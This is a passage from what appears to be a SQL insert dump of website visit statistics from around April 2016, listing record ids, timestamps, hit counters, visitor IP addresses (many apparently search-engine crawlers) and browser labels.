ther'),(30244,1459465545,3,3,0,0,'66.249.64.228','other'),(30245,1459465800,2,1,1,0,'66.249.64.233',''),(30246,1459465952,1,1,0,0,'66.249.64.223','other'),(30247,1459466043,2,2,0,0,'217.69.133.231','other'),(30248,1459466346,1,1,0,0,'217.69.133.222','other'),(30249,1459466392,1,1,0,0,'157.55.39.82','other'),(30250,1459466607,1,0,1,0,'66.249.64.228',''),(30251,1459466637,1,1,0,0,'217.69.133.217','other'),(30253,1459466800,1,0,1,0,'68.180.231.29',''),(30254,1459466862,1,1,0,0,'91.121.112.142','other'),(30255,1459467125,1,0,1,0,'66.249.64.233',''),(30256,1459467321,1,0,1,0,'66.249.64.223',''),(30257,1459467371,1,1,0,0,'40.77.167.26','other'),(30258,1459467675,1,1,0,0,'82.145.209.202','opera'),(30259,1459467685,1,1,0,0,'217.69.133.224','other'),(30260,1459467728,1,1,0,0,'217.69.133.85','other'),(30261,1459467729,1,1,0,0,'217.69.133.84','other'),(30262,1459467900,1,1,0,0,'51.255.65.19','other'),(30263,1459467980,1,1,0,0,'182.118.20.225','msie'),(30264,1459468259,1,1,0,0,'217.69.133.4','other'),(30265,1459468596,1,1,0,0,'217.69.133.235','other'),(30266,1459468598,1,1,0,0,'217.69.133.240','other'),(30268,1459468689,18,18,0,0,'130.193.50.34','other'),(30269,1459468714,1,0,1,0,'66.249.64.223',''),(30270,1459468717,8,8,0,0,'141.8.183.25','other'),(30271,1459468768,1,1,0,0,'141.8.142.58','other'),(30272,1459468814,9,9,0,0,'141.8.132.105','other'),(30273,1459468827,2,2,0,0,'130.193.51.19','other'),(30274,1459468835,4,4,0,0,'5.255.253.113','other'),(30275,1459468852,1,1,0,0,'217.69.133.70','other'),(30276,1459468853,2,2,0,0,'217.69.133.237','other'),(30277,1459468912,3,3,0,0,'130.193.51.83','other'),(30278,1459469137,1,1,0,0,'182.118.25.209','msie'),(30279,1459469252,1,1,0,0,'217.69.133.219','other'),(30280,1459469254,1,1,0,0,'217.69.133.217','other'),(30281,1459469255,1,1,0,0,'217.69.133.215','other'),(30282,1459469262,1,1,0,0,'66.249.64.233','other'),(30283,1459469628,1,1,0,0,'217.69.133.229','other'),(30284,1459469629,1,1,0,0,'217.69.133.228','other'),(30285,1459469762,1,1,0,0,'176.122.126.33','chrome'),(30286,1459469791,2,2,0,0,'141.8.132.105','other'),(30287,1459469795,2,2,0,0,'5.255.253.113','other'),(30288,1459469912,2,2,0,0,'217.69.133.84','other'),(30289,1459469946,5,5,0,0,'130.193.50.34','other'),(30290,1459469961,1,0,1,0,'66.249.64.162',''),(30291,1459470166,2,2,0,0,'217.69.133.231','other'),(30292,1459470431,1,1,0,0,'217.69.133.2','other'),(30293,1459470432,1,1,0,0,'217.69.133.5','other'),(30294,1459470433,1,1,0,0,'217.69.133.4','other'),(30295,1459470435,1,1,0,0,'217.69.133.203','other'),(30296,1459470729,1,1,0,0,'217.69.133.226','other'),(30297,1459470730,1,1,0,0,'217.69.133.224','other'),(30298,1459470731,1,1,0,0,'217.69.133.222','other'),(30299,1459470732,1,1,0,0,'217.69.133.223','other'),(30300,1459470735,1,1,0,0,'217.69.133.221','other'),(30301,1459470800,1,1,0,0,'217.69.133.235','other'),(30302,1459470869,3,0,3,0,'66.249.64.223',''),(30303,1459470967,1,1,0,0,'217.69.133.228','other'),(30304,1459470983,3,3,0,0,'130.193.50.34','other'),(30305,1459471101,3,3,0,0,'141.8.132.105','other'),(30306,1459471112,1,1,0,0,'217.69.136.204','other'),(30307,1459471114,1,1,0,0,'217.69.136.205','other'),(30308,1459471272,1,0,1,0,'68.180.229.103',''),(30309,1459471341,1,0,1,0,'66.249.64.228',''),(30310,1459471444,2,0,2,0,'68.180.231.29',''),(30311,1459471738,1,1,0,0,'217.69.133.231','other'),(30312,1459471757,1,1,0,0,'141.8.183.25','other'),(30313,1459471761,1,1,0,0,'5.255.253.113','other'),(30314,1459472295,1,1,0,0,'66.249.64.228','other'),(30315,1459472472,1,1,0,0,'217.69.133.215','other'),(30316,1459472743,1,1,0,0,'217.69.133.84','other'),(30317,1459472744,1,1,0,0,'217.69.133.217','other'),(30318,1459473233,1,1,0,0,'217.69.133.225','other'),(30320,1459473234,1,1,0,0,'217.69.133.223','other'),(30321,1459473462,2,2,0,0,'128.199.176.211','other'),(30322,1459474116,1,0,1,0,'66.249.64.233',''),(30323,1459474120,3,0,3,0,'66.249.64.228',''),(30324,1459474332,1,1,0,0,'217.69.133.6','other'),(30325,1459474334,1,1,0,0,'217.69.133.5','other'),(30326,1459474388,1,1,0,0,'217.69.133.229','other'),(30327,1459474711,1,1,0,0,'66.249.89.118','other'),(30328,1459475062,2,2,0,0,'217.69.133.235','other'),(30329,1459475063,1,1,0,0,'217.69.133.236','other'),(30330,1459475064,1,1,0,0,'217.69.133.226','other'),(30331,1459475065,1,1,0,0,'217.69.133.223','other'),(30332,1459475120,1,1,0,0,'130.193.50.34','other'),(30333,1459475267,1,1,0,0,'207.46.13.94','other'),(30334,1459475319,2,2,0,0,'217.69.133.70','other'),(30335,1459475321,1,1,0,0,'217.69.133.240','other'),(30336,1459475574,5,1,4,0,'66.249.64.228',''),(30337,1459475600,1,1,0,0,'62.210.215.100','chrome'),(30338,1459475706,2,0,2,0,'66.249.64.233',''),(30339,1459476038,1,1,0,0,'8.29.198.26','other'),(30340,1459476292,2,0,2,0,'66.249.64.223',''),(30341,1459476306,2,2,0,0,'130.193.50.34','other'),(30342,1459476514,1,1,0,0,'217.69.133.68','other'),(30343,1459476515,1,1,0,0,'217.69.133.220','other'),(30344,1459476672,1,1,0,0,'217.69.133.2','other'),(30345,1459476674,1,1,0,0,'217.69.133.5','other'),(30346,1459476820,1,1,0,0,'151.80.31.177','other'),(30347,1459477530,2,2,0,0,'217.69.133.67','other'),(30348,1459477531,3,3,0,0,'217.69.133.218','other'),(30349,1459477582,1,1,0,0,'95.135.91.48','firefox'),(30350,1459477899,1,1,0,0,'217.69.133.227','other'),(30351,1459477926,1,0,1,0,'66.249.64.228',''),(30352,1459478042,1,1,0,0,'217.69.133.215','other'),(30353,1459478043,1,1,0,0,'217.69.133.216','other'),(30354,1459478066,1,0,1,0,'68.180.231.29',''),(30355,1459478080,1,1,0,0,'217.69.133.220','other'),(30356,1459478081,2,2,0,0,'217.69.133.223','other'),(30357,1459478082,1,1,0,0,'217.69.133.226','other'),(30358,1459478083,1,1,0,0,'217.69.133.224','other'),(30359,1459478406,1,1,0,0,'217.69.133.11','other'),(30360,1459478407,1,1,0,0,'217.69.133.12','other'),(30361,1459478624,1,1,0,0,'151.80.31.157','other'),(30362,1459478655,1,1,0,0,'40.77.167.35','other'),(30363,1459480182,1,1,0,0,'217.69.133.233','other'),(30364,1459480183,2,2,0,0,'217.69.133.232','other'),(30365,1459480184,1,1,0,0,'217.69.133.231','other'),(30366,1459480223,1,0,1,0,'66.249.64.228',''),(30367,1459480361,1,1,0,0,'51.255.65.40','other'),(30368,1459480603,1,0,1,0,'66.249.64.150',''),(30369,1459480778,1,1,0,0,'164.132.161.50','other'),(30370,1459480809,1,1,0,0,'217.69.133.216','other'),(30371,1459480810,1,1,0,0,'217.69.133.219','other'),(30372,1459480835,2,0,2,0,'68.180.231.29',''),(30373,1459480878,2,0,2,0,'66.249.64.223',''),(30374,1459481071,1,1,0,0,'217.69.133.229','other'),(30375,1459481415,1,0,1,0,'66.249.64.233',''),(30376,1459481436,3,0,3,0,'66.249.64.228',''),(30377,1459481715,1,1,0,0,'217.69.133.237','other'),(30378,1459481906,1,1,0,0,'217.69.133.221','other'),(30380,1459481907,1,1,0,0,'217.69.133.226','other'),(30381,1459482080,2,2,0,0,'217.69.133.240','other'),(30382,1459482223,1,1,0,0,'217.69.133.228','other'),(30383,1459482224,1,1,0,0,'217.69.133.227','other'),(30384,1459482345,1,1,0,0,'164.132.161.48','other'),(30385,1459482409,1,1,0,0,'95.133.238.224','chrome'),(30386,1459482425,1,1,0,0,'85.14.245.175','other'),(30387,1459482426,2,2,0,0,'85.14.244.114','other'),(30388,1459482428,1,1,0,0,'193.111.140.153','other'),(30389,1459482518,1,1,0,0,'217.69.133.215','other'),(30390,1459482519,1,1,0,0,'217.69.133.219','other'),(30391,1459482520,1,1,0,0,'217.69.133.85','other'),(30392,1459482521,1,1,0,0,'217.69.133.218','other'),(30393,1459482592,3,3,0,0,'89.163.148.58','other'),(30394,1459482950,1,1,0,0,'128.74.245.31','msie'),(30396,1459482954,1,1,0,0,'95.28.181.190','msie'),(30398,1459482958,1,1,0,0,'188.244.36.217','msie'),(30399,1459483001,2,0,2,0,'66.249.64.228',''),(30400,1459483300,1,1,0,0,'217.69.133.12','other'),(30401,1459483302,2,2,0,0,'217.69.133.11','other'),(30402,1459483303,2,2,0,0,'217.69.133.15','other'),(30403,1459483772,1,0,1,0,'66.249.64.223',''),(30404,1459484469,1,1,0,0,'109.207.82.185','chrome'),(30405,1459484470,1,1,0,0,'128.75.71.77','msie'),(30406,1459484471,1,1,0,0,'109.173.20.42','opera'),(30407,1459484472,1,1,0,0,'46.188.21.187','msie'),(30408,1459484473,1,1,0,0,'37.112.35.49','msie'),(30409,1459484523,1,1,0,0,'66.249.64.233','other'),(30410,1459484767,20,20,0,0,'51.254.121.186','other'),(30411,1459484907,3,0,3,0,'66.249.64.223',''),(30412,1459485031,1,1,0,0,'66.249.89.116','other'),(30413,1459485208,1,1,0,0,'62.210.215.100','chrome'),(30414,1459485628,1,1,0,0,'180.76.15.33','other'),(30415,1459485704,1,1,0,0,'217.69.133.224','other'),(30416,1459486041,1,1,0,0,'141.8.132.105','other'),(30417,1459486122,1,1,0,0,'46.200.109.133','firefox'),(30418,1459486198,1,1,0,0,'46.211.253.107','other'),(30419,1459486231,1,1,0,0,'217.69.133.229','other'),(30420,1459486453,1,1,0,0,'217.69.133.191','other'),(30421,1459486454,1,1,0,0,'217.69.133.250','other'),(30422,1459486456,1,1,0,0,'217.69.133.21','other'),(30423,1459486457,1,1,0,0,'217.69.133.249','other'),(30424,1459486459,1,1,0,0,'217.69.133.70','other'),(30425,1459486734,2,2,0,0,'217.69.133.235','other'),(30426,1459486869,1,1,0,0,'8.29.198.25','other'),(30427,1459486897,1,1,0,0,'217.69.133.219','other'),(30428,1459486898,1,1,0,0,'217.69.133.216','other'),(30430,1459486899,1,1,0,0,'217.69.133.217','other'),(30431,1459487033,1,1,0,0,'217.69.133.10','other'),(30432,1459487039,1,1,0,0,'217.69.133.231','other'),(30433,1459487065,1,1,0,0,'91.196.178.37','msie'),(30434,1459487122,1,1,0,0,'164.132.161.84','other'),(30435,1459487159,1,1,0,0,'66.249.64.233','other'),(30436,1459487233,2,2,0,0,'157.55.39.82','other'),(30437,1459487362,1,1,0,0,'130.193.50.34','other'),(30438,1459487418,1,1,0,0,'217.69.133.240','other'),(30439,1459487419,1,1,0,0,'217.69.133.238','other'),(30440,1459487468,4,3,1,0,'66.249.64.223',''),(30441,1459487659,1,0,1,0,'66.249.64.228',''),(30442,1459487881,1,1,0,0,'51.255.65.79','other'),(30443,1459487884,1,1,0,0,'62.210.215.100','chrome'),(30444,1459487945,3,1,2,0,'66.249.64.223',''),(30445,1459488173,2,2,0,0,'66.249.64.228','other'),(30446,1459488502,2,2,0,0,'66.249.64.233','other'),(30447,1459488930,1,1,0,0,'217.69.133.224','other'),(30448,1459489124,1,1,0,0,'164.132.161.40','other'),(30449,1459489371,7,0,7,0,'66.249.64.223',''),(30450,1459489398,3,2,1,0,'66.249.64.228',''),(30451,1459489460,1,1,0,0,'217.69.133.85','other'),(30453,1459489461,1,1,0,0,'217.69.133.67','other'),(30454,1459489631,1,1,0,0,'51.255.65.31','other'),(30455,1459489738,1,1,0,0,'91.196.178.72','chrome'),(30456,1459489767,1,0,1,0,'68.180.231.29',''),(30457,1459489915,1,1,0,0,'217.69.133.216','other'),(30458,1459489917,1,1,0,0,'217.69.133.217','other'),(30459,1459490047,1,0,1,0,'66.249.64.233',''),(30460,1459490095,1,0,1,0,'66.249.64.156',''),(30461,1459490307,2,1,1,0,'66.249.64.233',''),(30462,1459490387,1,1,0,0,'91.196.178.66','firefox'),(30463,1459490553,1,1,0,0,'51.255.65.63','other'),(30464,1459490585,1,1,0,0,'164.132.161.60','other'),(30465,1459490754,1,1,0,0,'168.235.205.110','other'),(30466,1459491291,1,0,1,0,'66.249.64.228',''),(30467,1459491414,1,1,0,0,'207.46.13.94','other'),(30468,1459491587,2,0,2,0,'68.180.231.29',''),(30469,1459491602,1,1,0,0,'217.69.136.208','other'),(30470,1459491603,1,1,0,0,'217.69.136.203','other'),(30471,1459491604,1,1,0,0,'217.69.136.210','other'),(30472,1459491606,1,1,0,0,'217.69.136.205','other'),(30473,1459492350,1,1,0,0,'217.69.133.69','other'),(30474,1459492351,2,2,0,0,'217.69.133.229','other'),(30475,1459492505,1,1,0,0,'207.46.13.94','other'),(30476,1459492521,1,1,0,0,'82.145.209.110','opera'),(30477,1459492531,2,0,2,0,'66.249.64.223',''),(30478,1459492568,1,1,0,0,'217.69.133.85','other'),(30479,1459492574,1,0,1,0,'66.249.64.233',''),(30480,1459492622,1,0,1,0,'66.249.64.228',''),(30481,1459492733,1,1,0,0,'66.249.93.67','chrome'),(30482,1459492765,1,0,1,0,'68.180.231.29',''),(30483,1459492958,1,1,0,0,'217.69.133.239','other'),(30484,1459493235,1,1,0,0,'217.69.133.2','other'),(30485,1459493237,1,1,0,0,'217.69.133.6','other'),(30486,1459493656,1,1,0,0,'217.69.133.228','other'),(30487,1459493657,1,1,0,0,'217.69.133.69','other'),(30488,1459493777,1,1,0,0,'180.76.15.5','other'),(30489,1459494029,1,1,0,0,'217.69.133.229','other'),(30490,1459494139,1,0,1,0,'66.249.64.162',''),(30491,1459494178,1,1,0,0,'217.69.136.209','other'),(30492,1459494708,1,1,0,0,'217.69.133.215','other'),(30493,1459494709,1,1,0,0,'217.69.133.216','other'),(30494,1459494769,1,1,0,0,'92.112.227.28','opera'),(30495,1459495418,1,1,0,0,'37.53.90.175','firefox'),(30496,1459495548,1,1,0,0,'151.80.31.108','other'),(30497,1459495719,1,1,0,0,'51.255.65.64','other'),(30498,1459495786,1,1,0,0,'180.76.15.12','other'),(30499,1459495888,3,0,3,0,'66.249.64.228',''),(30500,1459496111,1,1,0,0,'66.249.89.114','other'),(30501,1459496373,1,0,1,0,'66.249.64.223',''),(30502,1459496388,1,1,0,0,'91.196.178.66','firefox'),(30503,1459496465,1,1,0,0,'51.255.65.90','other'),(30504,1459496479,2,2,0,0,'141.8.183.25','other'),(30505,1459496805,1,1,0,0,'217.69.133.67','other'),(30506,1459496814,1,1,0,0,'82.145.209.25','opera'),(30507,1459496920,2,2,0,0,'130.193.50.34','other'),(30508,1459497044,1,1,0,0,'91.196.178.129','firefox'),(30509,1459497102,2,0,2,0,'66.249.64.233',''),(30510,1459497126,1,1,0,0,'141.8.132.105','other'),(30511,1459497289,1,1,0,0,'141.8.142.58','other'),(30512,1459497293,1,1,0,0,'5.255.253.113','other'),(30513,1459497368,1,1,0,0,'217.69.133.85','other'),(30514,1459497440,1,0,1,0,'66.249.64.228',''),(30515,1459497470,1,0,1,0,'66.249.64.223',''),(30516,1459497566,1,1,0,0,'178.94.180.252','chrome'),(30517,1459497693,1,1,0,0,'82.207.91.234','firefox'),(30518,1459497697,1,1,0,0,'8.29.198.26','other'),(30519,1459497774,1,1,0,0,'217.69.133.228','other'),(30520,1459497936,1,1,0,0,'217.69.133.2','other'),(30521,1459497937,1,1,0,0,'217.69.133.3','other'),(30522,1459497939,1,1,0,0,'217.69.133.6','other'),(30523,1459498148,2,2,0,0,'141.8.183.25','other'),(30524,1459498152,3,3,0,0,'141.8.132.105','other'),(30525,1459498156,5,5,0,0,'130.193.50.34','other'),(30526,1459498569,3,0,3,0,'66.249.64.228',''),(30527,1459498681,5,0,5,0,'66.249.64.223',''),(30528,1459498713,1,1,0,0,'62.210.215.100','chrome'),(30529,1459498830,1,0,1,0,'66.249.64.162',''),(30530,1459498849,1,1,0,0,'40.77.167.35','other'),(30531,1459498885,1,1,0,0,'164.132.161.92','other'),(30532,1459499166,1,1,0,0,'141.8.183.25','other'),(30533,1459499202,1,1,0,0,'93.158.152.202','other'),(30534,1459499332,1,1,0,0,'91.196.178.66','firefox'),(30535,1459499388,2,2,0,0,'130.193.50.34','other'),(30536,1459499391,2,1,1,0,'66.249.64.233',''),(30537,1459499407,1,1,0,0,'217.69.133.227','other'),(30539,1459499408,1,1,0,0,'217.69.133.232','other'),(30540,1459499722,2,0,2,0,'66.249.64.228',''),(30541,1459499739,1,1,0,0,'37.53.90.175','firefox'),(30542,1459499869,1,0,1,0,'68.180.231.29',''),(30543,1459499980,1,1,0,0,'91.196.178.162','firefox'),(30544,1459500035,1,1,0,0,'51.255.65.92','other'),(30545,1459500065,2,2,0,0,'5.255.253.113','other'),(30546,1459500143,1,1,0,0,'178.94.62.223','chrome'),(30547,1459500342,1,1,0,0,'141.8.132.105','other'),(30548,1459500352,1,1,0,0,'192.162.114.10','chrome'),(30549,1459500597,3,3,0,0,'141.8.183.25','other'),(30550,1459500639,2,0,2,0,'66.249.64.228',''),(30551,1459500650,4,0,4,0,'66.249.64.223',''),(30552,1459500709,1,1,0,0,'91.196.178.129','firefox'),(30553,1459500858,1,1,0,0,'46.188.21.232','msie'),(30554,1459500866,1,1,0,0,'128.75.71.77','msie'),(30556,1459500867,1,1,0,0,'176.77.56.66','msie'),(30557,1459500893,1,1,0,0,'212.193.117.245','other'),(30558,1459501010,1,1,0,0,'217.69.133.219','other'),(30559,1459501105,4,4,0,0,'130.193.50.34','other'),(30560,1459501199,1,0,1,0,'68.180.229.103',''),(30561,1459501442,1,0,1,0,'66.249.64.233',''),(30562,1459501599,1,1,0,0,'157.55.39.82','other'),(30563,1459501626,1,0,1,0,'66.249.64.223',''),(30564,1459501693,1,1,0,0,'5.255.253.113','other'),(30565,1459501729,1,1,0,0,'130.193.51.83','other'),(30566,1459501733,3,3,0,0,'141.8.132.105','other'),(30567,1459501739,1,1,0,0,'130.193.50.38','other'),(30568,1459501743,1,1,0,0,'141.8.142.61','other'),(30569,1459501759,1,1,0,0,'93.170.32.178','chrome'),(30570,1459501852,1,1,0,0,'93.170.32.178','other'),(30571,1459501891,1,1,0,0,'37.204.154.137','msie'),(30572,1459501892,1,1,0,0,'2.92.174.131','chrome'),(30574,1459501893,1,1,0,0,'46.188.72.113','opera'),(30575,1459501894,1,1,0,0,'176.15.55.93','msie'),(30576,1459502040,1,0,1,0,'66.249.64.150',''),(30577,1459502083,1,1,0,0,'217.69.133.216','other'),(30578,1459502105,2,2,0,0,'130.193.50.34','other'),(30579,1459502437,1,1,0,0,'181.214.37.162','msie'),(30580,1459502493,1,1,0,0,'51.255.65.81','other'),(30581,1459502575,1,1,0,0,'37.54.161.56','chrome'),(30582,1459502748,1,1,0,0,'141.8.183.25','other'),(30583,1459502935,5,5,0,0,'69.30.218.202','other'),(30584,1459502985,1,1,0,0,'40.77.167.35','other'),(30585,1459503112,7,7,0,0,'130.193.50.34','other'),(30586,1459503116,1,1,0,0,'5.255.253.113','other'),(30587,1459503238,1,1,0,0,'51.255.65.74','other'),(30588,1459503299,1,1,0,0,'217.69.133.5','other'),(30589,1459503300,1,1,0,0,'217.69.133.9','other'),(30590,1459503301,1,1,0,0,'217.69.133.203','other'),(30591,1459503302,1,1,0,0,'217.69.133.2','other'),(30592,1459503697,1,1,0,0,'141.8.142.58','other'),(30593,1459503909,1,1,0,0,'94.179.109.156','firefox'),(30594,1459503954,1,1,0,0,'66.249.64.223','other'),(30595,1459504011,1,1,0,0,'217.69.133.235','other'),(30597,1459504041,1,1,0,0,'178.255.215.95','other'),(30598,1459504074,3,3,0,0,'130.193.50.34','other'),(30599,1459504203,1,1,0,0,'217.69.133.69','other'),(30600,1459504334,1,1,0,0,'130.193.51.19','other'),(30601,1459504395,1,0,1,0,'66.249.64.233',''),(30602,1459504680,2,2,0,0,'130.193.51.83','other'),(30603,1459504780,1,1,0,0,'217.69.133.223','other'),(30604,1459504781,1,1,0,0,'217.69.133.222','other'),(30605,1459504981,1,1,0,0,'141.8.132.105','other'),(30606,1459505314,2,2,0,0,'130.193.51.19','other'),(30607,1459505322,10,10,0,0,'130.193.50.34','other'),(30608,1459505471,1,1,0,0,'217.69.143.50','other'),(30609,1459505488,1,1,0,0,'141.0.14.247','opera'),(30610,1459505612,3,0,3,0,'66.249.64.223',''),(30611,1459505768,3,3,0,0,'5.255.253.113','other'),(30612,1459505785,3,0,3,0,'66.249.64.228',''),(30613,1459505797,1,0,1,0,'68.180.231.29',''),(30614,1459506087,6,6,0,0,'141.8.132.105','other'),(30615,1459506091,1,1,0,0,'141.8.183.25','other'),(30616,1459506100,1,1,0,0,'217.69.133.222','other'),(30617,1459506254,1,1,0,0,'164.132.161.60','other'),(30618,1459506329,2,0,2,0,'66.249.64.233',''),(30619,1459506513,1,1,0,0,'217.69.133.226','other'),(30620,1459506732,1,1,0,0,'217.69.133.67','other'),(30622,1459507072,1,1,0,0,'130.193.51.83','other'),(30623,1459507204,6,1,5,0,'66.249.64.223',''),(30624,1459507331,1,1,0,0,'141.0.15.83','opera'),(30625,1459507441,1,1,0,0,'66.249.89.118','other'),(30626,1459507487,1,1,0,0,'91.196.178.66','firefox'),(30627,1459507542,1,1,0,0,'141.8.183.25','other'),(30628,1459507694,2,0,2,0,'66.249.64.228',''),(30629,1459507770,1,1,0,0,'164.132.161.19','other'),(30630,1459507824,1,1,0,0,'141.8.142.58','other'),(30631,1459507853,1,1,0,0,'217.69.143.53','other'),(30632,1459508170,1,0,1,0,'66.249.64.233',''),(30633,1459508227,1,1,0,0,'130.193.51.83','other'),(30634,1459508249,2,2,0,0,'66.249.64.233','other'),(30635,1459508392,1,0,1,0,'66.249.64.223',''),(30636,1459508448,1,1,0,0,'164.132.161.93','other'),(30637,1459508465,1,1,0,0,'217.69.133.220','other'),(30638,1459508546,2,2,0,0,'66.249.64.223','other'),(30639,1459508558,1,1,0,0,'8.29.198.26','other'),(30640,1459508643,1,1,0,0,'141.8.132.105','other'),(30641,1459508687,1,1,0,0,'51.255.65.69','other'),(30642,1459508773,1,1,0,0,'62.210.215.100','chrome'),(30643,1459508822,1,1,0,0,'217.69.133.219','other'),(30644,1459508823,1,1,0,0,'217.69.133.215','other'),(30645,1459508824,1,1,0,0,'217.69.133.85','other'),(30647,1459509042,1,1,0,0,'141.8.183.25','other'),(30648,1459509123,1,1,0,0,'51.255.65.37','other'),(30649,1459509386,2,0,2,0,'68.180.231.29',''),(30650,1459509540,1,1,0,0,'5.255.253.113','other'),(30651,1459509721,2,1,1,0,'66.249.64.223',''),(30652,1459510047,1,1,0,0,'164.132.161.54','other'),(30653,1459510128,86,86,0,0,'5.9.73.227','other'),(30654,1459510165,1,1,0,0,'130.193.51.19','other'),(30655,1459510377,1,1,0,0,'217.69.133.232','other'),(30656,1459510747,13,0,13,0,'68.180.229.103',''),(30657,1459510770,2,2,0,0,'141.8.183.25','other'),(30658,1459510774,2,2,0,0,'130.193.50.34','other'),(30659,1459510912,1,0,1,0,'68.180.231.29',''),(30661,1459510913,1,1,0,0,'217.69.136.208','other'),(30662,1459511147,1,0,1,0,'66.249.64.233',''),(30663,1459511530,1,1,0,0,'164.132.161.11','other'),(30664,1459511645,1,1,0,0,'164.132.161.25','other'),(30665,1459511672,1,1,0,0,'92.112.227.28','chrome'),(30666,1459511713,3,0,3,0,'68.180.229.103',''),(30667,1459511789,1,1,0,0,'141.8.142.58','other'),(30668,1459511825,1,0,1,0,'66.249.64.162',''),(30669,1459511844,1,1,0,0,'40.77.167.26','other'),(30670,1459512032,1,1,0,0,'207.46.13.94','other'),(30671,1459512178,1,1,0,0,'95.135.56.128','chrome'),(30672,1459512250,1,1,0,0,'95.132.67.88','chrome'),(30673,1459512262,2,2,0,0,'130.193.51.83','other'),(30674,1459512453,1,0,1,0,'66.249.64.233',''),(30675,1459512466,1,0,1,0,'66.249.64.228',''),(30676,1459512473,1,1,0,0,'66.249.64.162','other'),(30677,1459512739,1,0,1,0,'66.249.64.150',''),(30678,1459512759,2,2,0,0,'217.69.133.67','other'),(30679,1459512760,1,1,0,0,'217.69.133.219','other'),(30681,1459513157,3,3,0,0,'130.193.50.34','other'),(30682,1459513195,1,0,1,0,'68.180.229.103',''),(30683,1459513336,1,1,0,0,'91.196.178.68','firefox'),(30684,1459513515,1,0,1,0,'66.249.64.228',''),(30685,1459513607,1,1,0,0,'164.132.161.47','other'),(30686,1459513628,2,0,2,0,'66.249.64.223',''),(30687,1459513721,1,1,0,0,'91.196.178.165','other'),(30688,1459513926,3,3,0,0,'141.8.132.105','other'),(30689,1459513992,65,65,0,0,'5.9.111.70','other'),(30690,1459514142,1,1,0,0,'217.69.133.222','other'),(30691,1459514230,1,0,1,0,'66.249.64.233',''),(30692,1459514289,1,1,0,0,'217.69.133.231','other'),(30694,1459514317,1,1,0,0,'46.105.135.52','firefox'),(30695,1459514578,1,1,0,0,'217.69.133.230','other'),(30696,1459514615,1,1,0,0,'217.69.133.236','other'),(30697,1459514716,2,2,0,0,'130.193.50.34','other'),(30698,1459514724,1,0,1,0,'66.249.64.223',''),(30699,1459514807,1,1,0,0,'217.69.133.84','other'),(30700,1459515132,2,0,2,0,'66.249.69.77',''),(30701,1459515344,1,0,1,0,'66.249.69.85',''),(30702,1459515392,1,1,0,0,'217.69.133.194','other'),(30703,1459515393,1,1,0,0,'217.69.133.4','other'),(30704,1459515524,2,2,0,0,'141.8.132.105','other'),(30705,1459515531,1,1,0,0,'95.134.221.41','chrome'),(30706,1459515676,1,0,1,0,'68.180.231.29',''),(30707,1459515969,1,1,0,0,'164.132.161.37','other'),(30708,1459516131,1,1,0,0,'180.76.15.144','other'),(30709,1459516258,2,2,0,0,'217.69.133.68','other'),(30710,1459516378,1,1,0,0,'176.193.101.249','chrome'),(30711,1459516379,1,1,0,0,'109.173.59.147','msie'),(30712,1459516380,1,1,0,0,'188.32.226.103','opera'),(30714,1459516382,1,1,0,0,'176.15.55.93','msie'),(30715,1459516469,2,0,2,0,'68.180.229.103',''),(30716,1459516812,1,1,0,0,'68.64.168.162','other'),(30717,1459517137,1,1,0,0,'5.255.253.113','other'),(30718,1459517141,1,1,0,0,'141.8.132.105','other'),(30719,1459517145,2,2,0,0,'130.193.50.34','other'),(30720,1459517760,2,0,2,0,'66.249.69.85',''),(30721,1459517767,1,0,1,0,'66.249.69.77',''),(30722,1459518276,1,0,1,0,'66.249.69.93',''),(30723,1459518599,1,1,0,0,'217.69.133.68','other'),(30724,1459518621,1,1,0,0,'66.249.91.37','other'),(30725,1459518670,1,1,0,0,'95.132.75.113','chrome'),(30726,1459518721,1,1,0,0,'91.196.178.69','firefox'),(30727,1459518865,1,1,0,0,'95.84.181.107','msie'),(30728,1459518868,1,1,0,0,'176.195.30.185','msie'),(30729,1459518869,1,1,0,0,'5.228.75.56','msie'),(30730,1459518871,1,1,0,0,'178.140.238.139','msie'),(30731,1459518881,1,1,0,0,'141.8.183.25','other'),(30732,1459518953,1,0,1,0,'66.249.69.156',''),(30733,1459519000,4,0,4,0,'66.249.69.85',''),(30734,1459519105,11,11,0,0,'51.254.121.188','other'),(30735,1459519217,1,1,0,0,'62.210.215.100','chrome'),(30736,1459519421,1,1,0,0,'8.29.198.26','other'),(30737,1459519471,2,2,0,0,'217.69.133.9','other'),(30738,1459519472,1,1,0,0,'217.69.133.6','other'),(30739,1459519794,1,1,0,0,'5.255.253.113','other'),(30740,1459519798,1,1,0,0,'141.8.183.25','other'),(30741,1459519802,2,2,0,0,'141.8.132.105','other'),(30742,1459519993,1,1,0,0,'91.196.178.100','chrome'),(30743,1459520433,3,0,3,0,'66.249.69.93',''),(30744,1459520452,1,0,1,0,'66.249.69.77',''),(30745,1459520486,1,1,0,0,'217.69.136.209','other'),(30746,1459520487,1,1,0,0,'217.69.136.205','other'),(30747,1459520493,1,0,1,0,'66.249.69.85',''),(30748,1459520599,1,1,0,0,'46.165.197.142','other'),(30749,1459520628,1,1,0,0,'130.193.51.83','other'),(30750,1459520962,1,1,0,0,'217.69.133.6','other'),(30751,1459520963,1,1,0,0,'217.69.133.4','other'),(30752,1459521046,1,1,0,0,'217.69.133.232','other'),(30753,1459521222,1,1,0,0,'91.196.178.164','firefox'),(30754,1459521506,1,0,1,0,'68.180.231.29',''),(30755,1459521542,1,1,0,0,'217.69.133.67','other'),(30756,1459521710,1,1,0,0,'141.8.183.25','other'),(30757,1459521714,1,1,0,0,'130.193.51.83','other'),(30758,1459521744,1,1,0,0,'151.80.31.169','other'),(30759,1459521770,1,1,0,0,'157.55.39.251','other'),(30760,1459522053,1,1,0,0,'217.69.133.226','other'),(30761,1459522329,1,1,0,0,'157.55.39.82','other'),(30762,1459522331,3,0,3,0,'66.249.69.85',''),(30763,1459522788,1,1,0,0,'5.255.253.113','other'),(30764,1459522951,1,0,1,0,'66.249.69.150',''),(30765,1459523238,1,1,0,0,'51.255.65.80','other'),(30766,1459523488,17,0,17,0,'68.180.231.29',''),(30767,1459523561,1,1,0,0,'157.55.39.82','other'),(30768,1459523586,1,1,0,0,'217.69.133.226','other'),(30769,1459523837,1,1,0,0,'178.154.189.37','other'),(30770,1459524114,1,1,0,0,'217.69.133.216','other'),(30771,1459524888,1,0,1,0,'66.249.69.150',''),(30772,1459524993,1,1,0,0,'5.255.253.113','other'),(30773,1459525054,1,0,1,0,'66.249.69.85',''),(30774,1459525626,3,1,2,0,'66.249.69.77',''),(30775,1459525822,1,1,0,0,'217.69.133.225','other'),(30776,1459526018,1,1,0,0,'141.8.183.25','other'),(30777,1459526254,2,2,0,0,'66.249.69.93','other'),(30778,1459526526,2,0,2,0,'66.249.6